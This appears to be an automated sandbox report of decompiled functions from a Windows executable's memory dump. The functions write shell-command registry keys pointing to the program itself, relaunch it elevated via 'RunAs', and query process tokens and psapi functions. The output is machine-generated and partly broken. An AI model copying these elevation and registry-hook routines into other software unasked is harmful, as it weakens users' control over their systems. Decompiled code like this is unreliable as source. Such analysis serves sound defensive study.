				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                      0x00407b65
                                                                                      0x00407b7c
                                                                                      0x00407b83
                                                                                      0x00407b91
                                                                                      0x00407b98
                                                                                      0x00407ba6
                                                                                      0x00407bad
                                                                                      0x00407bb2
                                                                                      0x00407bb9
                                                                                      0x00407bca
                                                                                      0x00407bcb
                                                                                      0x00407bd6
                                                                                      0x00407bdb
                                                                                      0x00407bdc
                                                                                      0x00407be1
                                                                                      0x00407be1
                                                                                      0x00407be8
                                                                                      0x00407bf9
                                                                                      0x00407bfa
                                                                                      0x00407c05
                                                                                      0x00407c0a
                                                                                      0x00407c0b
                                                                                      0x00407c1c
                                                                                      0x00407c21
                                                                                      0x00407c21
                                                                                      0x00407c2a
                                                                                      0x00407c2b
                                                                                      0x00407c36
                                                                                      0x00407c3b
                                                                                      0x00407c3c
                                                                                      0x00407c41
                                                                                      0x00407c51
                                                                                      0x00407c56
                                                                                      0x00407c5b
                                                                                      0x00407c65
                                                                                      0x00407c68
                                                                                      0x00407c6b
                                                                                      0x00407c74
                                                                                      0x00407c7b
                                                                                      0x00407c80
                                                                                      0x00407c82
                                                                                      0x00407c88
                                                                                      0x00407ca6
                                                                                      0x00407c8a
                                                                                      0x00407c8a
                                                                                      0x00407c8b
                                                                                      0x00407c96
                                                                                      0x00407c9b
                                                                                      0x00407c9c
                                                                                      0x00407ca1
                                                                                      0x00407ca1
                                                                                      0x00407cb3
                                                                                      0x00407cb4
                                                                                      0x00407cbd
                                                                                      0x00407cc4
                                                                                      0x00407cc5
                                                                                      0x00407cd0
                                                                                      0x00407cd5
                                                                                      0x00407cd6
                                                                                      0x00407cdb
                                                                                      0x00407ceb
                                                                                      0x00407cf0
                                                                                      0x00407cf3
                                                                                      0x00407cf3
                                                                                      0x00407cf3
                                                                                      0x00000000
                                                                                      0x00407cfc
                                                                                      0x00407d00

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                      • API String ID: 2000436516-3842416460
                                                                                      • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                      • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                      • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 51%
                                                                                      			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                      0x00404415
                                                                                      0x0040441d
                                                                                      0x0040442c
                                                                                      0x00404435
                                                                                      0x004045b3
                                                                                      0x004045b7
                                                                                      0x004045b7
                                                                                      0x0040444b
                                                                                      0x00404452
                                                                                      0x00404457
                                                                                      0x00404460
                                                                                      0x00404461
                                                                                      0x00404462
                                                                                      0x0040446d
                                                                                      0x00404472
                                                                                      0x00404473
                                                                                      0x00404490
                                                                                      0x004044a5
                                                                                      0x004044b4
                                                                                      0x004044b6
                                                                                      0x004044b7
                                                                                      0x004044bd
                                                                                      0x004044cf
                                                                                      0x004044db
                                                                                      0x004044eb
                                                                                      0x004044f1
                                                                                      0x004044f6
                                                                                      0x004044f9
                                                                                      0x004044fe
                                                                                      0x00404506
                                                                                      0x00404507
                                                                                      0x00404508
                                                                                      0x00404510
                                                                                      0x00404521
                                                                                      0x00404532
                                                                                      0x00404539
                                                                                      0x00404547
                                                                                      0x0040454e
                                                                                      0x0040455b
                                                                                      0x0040455c
                                                                                      0x00404564
                                                                                      0x0040456f
                                                                                      0x00404570
                                                                                      0x00404571
                                                                                      0x0040457c
                                                                                      0x0040457d
                                                                                      0x00404588
                                                                                      0x00404589
                                                                                      0x0040458a
                                                                                      0x004045a0
                                                                                      0x004045a5
                                                                                      0x00404521
                                                                                      0x004044eb
                                                                                      0x004045ab
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00404452
                                                                                      • _snwprintf.MSVCRT ref: 00404473
                                                                                        • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                        • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                        • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                      • memset.MSVCRT ref: 004044CF
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                      • memset.MSVCRT ref: 00404539
                                                                                      • memset.MSVCRT ref: 0040454E
                                                                                      • _snwprintf.MSVCRT ref: 00404571
                                                                                      • _snwprintf.MSVCRT ref: 0040458A
                                                                                        • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                      • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                      • API String ID: 486436031-734527199
                                                                                      • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                      • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                      • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 87%
                                                                                      			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                      0x00406466
                                                                                      0x0040647d
                                                                                      0x00406484
                                                                                      0x00406499
                                                                                      0x004064a0
                                                                                      0x004064af
                                                                                      0x004064b4
                                                                                      0x004064bb
                                                                                      0x004064cd
                                                                                      0x004064d2
                                                                                      0x004064d4
                                                                                      0x004064e4
                                                                                      0x004064ea
                                                                                      0x004064ea
                                                                                      0x004064f3
                                                                                      0x00406503
                                                                                      0x00406514
                                                                                      0x00406525
                                                                                      0x0040653b
                                                                                      0x0040654e
                                                                                      0x00406568
                                                                                      0x00406572
                                                                                      0x0040657a
                                                                                      0x00406582
                                                                                      0x0040658a
                                                                                      0x00406596

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00406484
                                                                                      • memset.MSVCRT ref: 004064A0
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                        • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                        • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                        • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                        • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                        • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                      • wcscpy.MSVCRT ref: 004064E4
                                                                                      • wcscpy.MSVCRT ref: 004064F3
                                                                                      • wcscpy.MSVCRT ref: 00406503
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                      • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                      • wcscpy.MSVCRT ref: 0040657A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                      • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                      • API String ID: 3037099051-2314623505
                                                                                      • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                      • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                      • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401C26, Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 72synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 75%
                                                                                      			E00401C26(long _a4) {
				struct _SHELLEXECUTEINFOW _v68;
				void _v582;
				char _v584;
				void _v1110;
				char _v1112;
				long _t23;
				int _t36;
				void* _t43;
				long _t44;

				_t44 = 0;
				_t23 = GetCurrentProcessId();
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				_v1112 = 0;
				memset( &_v1110, 0, 0x208);
				E00404AD9( &_v1112);
				_push(_t23);
				_push(0);
				_push(_a4);
				_push(L"/SpecialRun %I64x %d");
				_push(0xff);
				_push( &_v584);
				L0040B1EC();
				memset( &(_v68.fMask), 0, 0x38);
				_v68.lpFile =  &_v1112;
				_v68.lpParameters =  &_v584;
				_v68.cbSize = 0x3c;
				_v68.lpVerb = L"RunAs";
				_v68.fMask = 0x40;
				_v68.nShow = 5;
				_t36 = ShellExecuteExW( &_v68);
				_t43 = _v68.hProcess;
				if(_t36 == 0) {
					_t44 = GetLastError();
				} else {
					WaitForSingleObject(_t43, 0x5dc);
					_a4 = 0;
					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {
						_t44 = _a4;
					}
				}
				return _t44;
			}












                                                                                      0x00401c31
                                                                                      0x00401c33
                                                                                      0x00401c48
                                                                                      0x00401c4f
                                                                                      0x00401c61
                                                                                      0x00401c68
                                                                                      0x00401c74
                                                                                      0x00401c79
                                                                                      0x00401c7a
                                                                                      0x00401c7b
                                                                                      0x00401c84
                                                                                      0x00401c89
                                                                                      0x00401c8e
                                                                                      0x00401c8f
                                                                                      0x00401c9b
                                                                                      0x00401ca6
                                                                                      0x00401caf
                                                                                      0x00401cb9
                                                                                      0x00401cc0
                                                                                      0x00401cc7
                                                                                      0x00401cce
                                                                                      0x00401cd5
                                                                                      0x00401cdd
                                                                                      0x00401ce0
                                                                                      0x00401d14
                                                                                      0x00401ce2
                                                                                      0x00401ce8
                                                                                      0x00401cf3
                                                                                      0x00401cfe
                                                                                      0x00401d09
                                                                                      0x00401d09
                                                                                      0x00401cfe
                                                                                      0x00401d1b

                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                                      • memset.MSVCRT ref: 00401C4F
                                                                                      • memset.MSVCRT ref: 00401C68
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00401C8F
                                                                                      • memset.MSVCRT ref: 00401C9B
                                                                                      • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                                      • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                                      • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                                      • GetLastError.KERNEL32 ref: 00401D0E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                                      • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                                      • API String ID: 903100921-3385179869
                                                                                      • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                                      • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                                      • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 44%
                                                                                      			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                      0x00409ab0
                                                                                      0x00409ab7
                                                                                      0x00409ac8
                                                                                      0x00409acf
                                                                                      0x00409ad4
                                                                                      0x00409ae0
                                                                                      0x00409ae6
                                                                                      0x00409ae8
                                                                                      0x00409af0
                                                                                      0x00409c3a
                                                                                      0x00409c41
                                                                                      0x00409c67
                                                                                      0x00000000
                                                                                      0x00409c67
                                                                                      0x00409c49
                                                                                      0x00409c50
                                                                                      0x00409c51
                                                                                      0x00409c56
                                                                                      0x00409c57
                                                                                      0x00409c5a
                                                                                      0x00000000
                                                                                      0x00409c64
                                                                                      0x00409b00
                                                                                      0x00409b03
                                                                                      0x00409b06
                                                                                      0x00409b0b
                                                                                      0x00409b10
                                                                                      0x00409ba9
                                                                                      0x00409bac
                                                                                      0x00409bc1
                                                                                      0x00409bc7
                                                                                      0x00409bcc
                                                                                      0x00409bd8
                                                                                      0x00409bf0
                                                                                      0x00409bf2
                                                                                      0x00409c23
                                                                                      0x00409c26
                                                                                      0x00409c2f
                                                                                      0x00409c34
                                                                                      0x00409c34
                                                                                      0x00000000
                                                                                      0x00409c2f
                                                                                      0x00409bf7
                                                                                      0x00409bfb
                                                                                      0x00409c02
                                                                                      0x00409c06
                                                                                      0x00409c0d
                                                                                      0x00409c14
                                                                                      0x00409c17
                                                                                      0x00409c18
                                                                                      0x00409c1b
                                                                                      0x00409c1e
                                                                                      0x00000000
                                                                                      0x00409c1e
                                                                                      0x00409b1f
                                                                                      0x00409b25
                                                                                      0x00409b2a
                                                                                      0x00409b2d
                                                                                      0x00409b33
                                                                                      0x00409b3d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b4b
                                                                                      0x00409b53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b6a
                                                                                      0x00409b6c
                                                                                      0x00409b6e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00409b77
                                                                                      0x00409b7b
                                                                                      0x00409b82
                                                                                      0x00409b86
                                                                                      0x00409b8d
                                                                                      0x00409b8e
                                                                                      0x00409b94
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00409AB7
                                                                                      • memset.MSVCRT ref: 00409ACF
                                                                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                      • _snwprintf.MSVCRT ref: 00409C5A
                                                                                        • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                      • memset.MSVCRT ref: 00409B25
                                                                                      • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                      • memset.MSVCRT ref: 00409BC7
                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                      • String ID: %s\%s$GetTokenInformation$Y@
                                                                                      • API String ID: 3504373036-27875219
                                                                                      • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                      • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                      • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                      0x00409179
                                                                                      0x00409209
                                                                                      0x00409209
                                                                                      0x00409185
                                                                                      0x0040918a
                                                                                      0x0040918f
                                                                                      0x00409208
                                                                                      0x00000000
                                                                                      0x00409191
                                                                                      0x0040919e
                                                                                      0x004091a2
                                                                                      0x004091a7
                                                                                      0x004091af
                                                                                      0x004091b3
                                                                                      0x004091b8
                                                                                      0x004091c0
                                                                                      0x004091c4
                                                                                      0x004091c9
                                                                                      0x004091d1
                                                                                      0x004091d5
                                                                                      0x004091da
                                                                                      0x004091e2
                                                                                      0x004091e6
                                                                                      0x004091eb
                                                                                      0x004091ed
                                                                                      0x004091ed
                                                                                      0x004091eb
